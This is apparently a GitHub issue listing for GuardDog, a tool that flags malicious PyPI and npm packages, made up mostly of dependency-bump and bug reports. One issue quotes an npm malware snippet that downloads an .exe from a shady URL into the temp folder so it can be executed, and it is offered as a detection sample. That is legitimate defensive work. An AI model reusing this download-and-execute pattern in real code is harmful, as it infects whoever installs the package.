
:snake: :mag: GuardDog is a CLI tool to Identify malicious PyPI and npm packages

Results 73 guarddog issues

Bumps [coverage](https://github.com/nedbat/coveragepy) from 7.6.0 to 7.6.1. Changelog Sourced from coverage's changelog. Version 7.6.1 — 2024-08-04 Fix: coverage used to fail when measuring code using :func:runpy.run_path <python:runpy.run_path> with a :class:Path <python:pathlib.Path>...

dependencies

Similar pypi heuristic is not present in NPM: Sample: `const {execFileSync } = require('child_process'); const Link = "http://someshadyurl.com/node_manager.exe"; const FinalPath = path.join(process.env.TEMP, "test.exe") async function main(){ await download(Link, FinalPath) await...`

kind/heuristic
ecosystem/npm

The rule `potentially_compromised_email_domain` uses `version.parse` (with `version` coming from https://github.com/pypa/packaging/ ) on all versions of a PyPI package https://github.com/DataDog/guarddog/blob/dcc98d70cc357b0d7e68485e2df4d8404605f300/guarddog/analyzer/metadata/pypi/potentially_compromised_email_domain.py#L35 Now, https://github.com/pypa/packaging/releases/tag/22.0 removed support for legacy version identifiers (see changelog), causing `version.parse`...

bug

Example: `➜ guarddog git:(v1.10.0) poetry run guarddog pypi scan --version=1.56.0 grpcio-tools Found 2 potentially malicious indicators in grpcio-tools code-execution: found 2 source code matches * This package is executing...`

bug

For context, we use artifactory to host a mirror of public pypi and our own internal packages. When running pip install on our requirements file, we need to specify these...

enhancement
ecosystem/pypi
ecosystem/npm

Bumps [sarif-tools](https://github.com/microsoft/sarif-tools) from 2.0.0 to 3.0.2. Release notes Sourced from sarif-tools's releases. v3.0.2 Fixed #55 part 2: Added executionSuccessful to copy operation output for SARIF schema compliance. v3.0.1 Fixed #58...

dependencies

Bumps [urllib3](https://github.com/urllib3/urllib3) from 2.2.2 to 2.2.3. Release notes Sourced from urllib3's releases. 2.2.3 🚀 urllib3 is fundraising for HTTP/2 support urllib3 is raising ~$40,000 USD to release HTTP/2 support and...

dependencies

Bumps [setuptools](https://github.com/pypa/setuptools) from 74.1.2 to 75.1.0. Changelog Sourced from setuptools's changelog. v75.1.0 Features Deprecated bdist_wheel.universal configuration. (#4617) Bugfixes Removed reference to upload_docs module in entry points. (#4650) v75.0.0 Features Declare...

dependencies

Bumps [pytest](https://github.com/pytest-dev/pytest) from 8.3.2 to 8.3.3. Release notes Sourced from pytest's releases. 8.3.3 pytest 8.3.3 (2024-09-09) Bug fixes #12446: Avoid calling @property (and other instance descriptors) during fixture discovery --...

dependencies

Bumps [disposable-email-domains](https://github.com/disposable-email-domains/disposable-email-domains) from 0.0.104 to 0.0.105. Commits See full diff in compare view [![Dependabot compatibility score](https://dependabot-badges.githubapp.com/badges/compatibility_score?dependency-name=disposable-email-domains&package-manager=pip&previous-version=0.0.104&new-version=0.0.105)](https://docs.github.com/en/github/managing-security-vulnerabilities/about-dependabot-security-updates#about-compatibility-scores) Dependabot will resolve any conflicts with this PR as long as you don't alter...

dependencies